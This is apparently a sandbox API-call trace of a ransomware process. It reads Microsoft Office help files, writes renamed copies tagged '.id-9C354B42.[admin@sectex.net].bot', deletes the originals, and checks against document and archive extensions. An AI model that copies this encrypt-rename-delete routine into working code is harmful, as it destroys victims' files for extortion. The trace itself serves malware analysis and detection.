	[0146.227] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0146.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.227] lstrlenW (lpString=".jpg") returned 4
	[0146.227] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0146.227] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0146.227] lstrlenW (lpString="INFOPATHEDITOR_F_COL.HXK") returned 24
	[0146.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.227] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0146.227] CloseHandle (hObject=0x3bc) returned 1
	[0146.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 0x20
	[0146.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.228] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.228] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.229] GetLastError () returned 0x0
	[0146.229] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0146.229] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0146.230] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.230] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0146.230] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.231] CloseHandle (hObject=0x3d0) returned 1
	[0146.231] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.231] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.234] CloseHandle (hObject=0x3bc) returned 1
	[0146.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 1
	[0146.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.235] lstrlenW (lpString=".doc") returned 4
	[0146.235] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.235] lstrlenW (lpString=".docx") returned 5
	[0146.235] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.235] lstrlenW (lpString=".pdf") returned 4
	[0146.235] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.235] lstrlenW (lpString=".xls") returned 4
	[0146.235] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.235] lstrlenW (lpString=".xlsx") returned 5
	[0146.235] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.235] lstrlenW (lpString=".ppt") returned 4
	[0146.236] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString=".zip") returned 4
	[0146.236] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString=".rar") returned 4
	[0146.236] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString=".bz2") returned 4
	[0146.236] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.236] lstrlenW (lpString=".7z") returned 3
	[0146.236] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString=".dbf") returned 4
	[0146.236] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString=".1cd") returned 4
	[0146.236] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString=".jpg") returned 4
	[0146.236] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.236] lstrlenW (lpString=".doc") returned 4
	[0146.236] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.236] lstrlenW (lpString=".docx") returned 5
	[0146.236] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.236] lstrlenW (lpString=".pdf") returned 4
	[0146.236] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString=".xls") returned 4
	[0146.236] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.236] lstrlenW (lpString=".xlsx") returned 5
	[0146.236] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.236] lstrlenW (lpString=".ppt") returned 4
	[0146.237] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.237] lstrlenW (lpString=".zip") returned 4
	[0146.237] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.237] lstrlenW (lpString=".rar") returned 4
	[0146.237] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.237] lstrlenW (lpString=".bz2") returned 4
	[0146.237] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.237] lstrlenW (lpString=".7z") returned 3
	[0146.237] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.237] lstrlenW (lpString=".dbf") returned 4
	[0146.237] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.237] lstrlenW (lpString=".1cd") returned 4
	[0146.237] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72
	[0146.237] lstrlenW (lpString=".jpg") returned 4
	[0146.237] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.237] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0146.237] lstrlenW (lpString="INFOPATHEDITOR_K_COL.HXK") returned 24
	[0146.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.238] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0146.238] CloseHandle (hObject=0x3bc) returned 1
	[0146.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 0x20
	[0146.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.238] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.238] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.239] GetLastError () returned 0x0
	[0146.239] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0146.240] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0146.242] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.242] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0146.242] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.242] CloseHandle (hObject=0x3d0) returned 1
	[0146.242] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.242] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.244] CloseHandle (hObject=0x3bc) returned 1
	[0146.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 1
	[0146.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.245] lstrlenW (lpString=".doc") returned 4
	[0146.245] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.245] lstrlenW (lpString=".docx") returned 5
	[0146.245] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.245] lstrlenW (lpString=".pdf") returned 4
	[0146.245] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.245] lstrlenW (lpString=".xls") returned 4
	[0146.245] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.245] lstrlenW (lpString=".xlsx") returned 5
	[0146.246] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.246] lstrlenW (lpString=".ppt") returned 4
	[0146.246] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString=".zip") returned 4
	[0146.246] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString=".rar") returned 4
	[0146.246] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString=".bz2") returned 4
	[0146.246] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.246] lstrlenW (lpString=".7z") returned 3
	[0146.246] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString=".dbf") returned 4
	[0146.246] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString=".1cd") returned 4
	[0146.246] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString=".jpg") returned 4
	[0146.246] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.246] lstrlenW (lpString=".doc") returned 4
	[0146.246] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0146.246] lstrlenW (lpString=".docx") returned 5
	[0146.246] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0146.246] lstrlenW (lpString=".pdf") returned 4
	[0146.246] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString=".xls") returned 4
	[0146.246] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0146.246] lstrlenW (lpString=".xlsx") returned 5
	[0146.247] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0146.247] lstrlenW (lpString=".ppt") returned 4
	[0146.247] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0146.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.247] lstrlenW (lpString=".zip") returned 4
	[0146.247] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0146.247] lstrlenW (lpString=".rar") returned 4
	[0146.247] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0146.247] lstrlenW (lpString=".bz2") returned 4
	[0146.247] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0146.247] lstrlenW (lpString=".7z") returned 3
	[0146.247] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0146.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.247] lstrlenW (lpString=".dbf") returned 4
	[0146.247] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0146.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.247] lstrlenW (lpString=".1cd") returned 4
	[0146.247] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0146.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72
	[0146.247] lstrlenW (lpString=".jpg") returned 4
	[0146.247] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0146.247] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0146.247] lstrlenW (lpString="INFOPATH_COL.HXC") returned 16
	[0146.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.248] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=636) returned 1
	[0146.248] CloseHandle (hObject=0x3bc) returned 1
	[0146.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 0x20
	[0146.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.248] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.248] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.249] GetLastError () returned 0x0
	[0146.249] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x27c, lpOverlapped=0x0) returned 1
	[0146.251] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0146.252] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.252] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0146.252] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.252] CloseHandle (hObject=0x3d0) returned 1
	[0146.252] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.252] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.254] CloseHandle (hObject=0x3bc) returned 1
	[0146.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.254] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc")) returned 1
	[0146.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.255] lstrlenW (lpString=".doc") returned 4
	[0146.255] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0146.255] lstrlenW (lpString=".docx") returned 5
	[0146.255] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0146.255] lstrlenW (lpString=".pdf") returned 4
	[0146.255] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0146.255] lstrlenW (lpString=".xls") returned 4
	[0146.255] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0146.255] lstrlenW (lpString=".xlsx") returned 5
	[0146.255] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0146.255] lstrlenW (lpString=".ppt") returned 4
	[0146.255] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0146.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.255] lstrlenW (lpString=".zip") returned 4
	[0146.255] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0146.255] lstrlenW (lpString=".rar") returned 4
	[0146.255] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0146.255] lstrlenW (lpString=".bz2") returned 4
	[0146.255] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0146.256] lstrlenW (lpString=".7z") returned 3
	[0146.256] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString=".dbf") returned 4
	[0146.256] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString=".1cd") returned 4
	[0146.256] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString=".jpg") returned 4
	[0146.256] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString=".doc") returned 4
	[0146.256] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0146.256] lstrlenW (lpString=".docx") returned 5
	[0146.256] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0146.256] lstrlenW (lpString=".pdf") returned 4
	[0146.256] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString=".xls") returned 4
	[0146.256] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString=".xlsx") returned 5
	[0146.256] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0146.256] lstrlenW (lpString=".ppt") returned 4
	[0146.256] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.256] lstrlenW (lpString=".zip") returned 4
	[0146.256] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString=".rar") returned 4
	[0146.256] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0146.256] lstrlenW (lpString=".bz2") returned 4
	[0146.256] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0146.256] lstrlenW (lpString=".7z") returned 3
	[0146.257] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0146.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.257] lstrlenW (lpString=".dbf") returned 4
	[0146.257] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0146.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
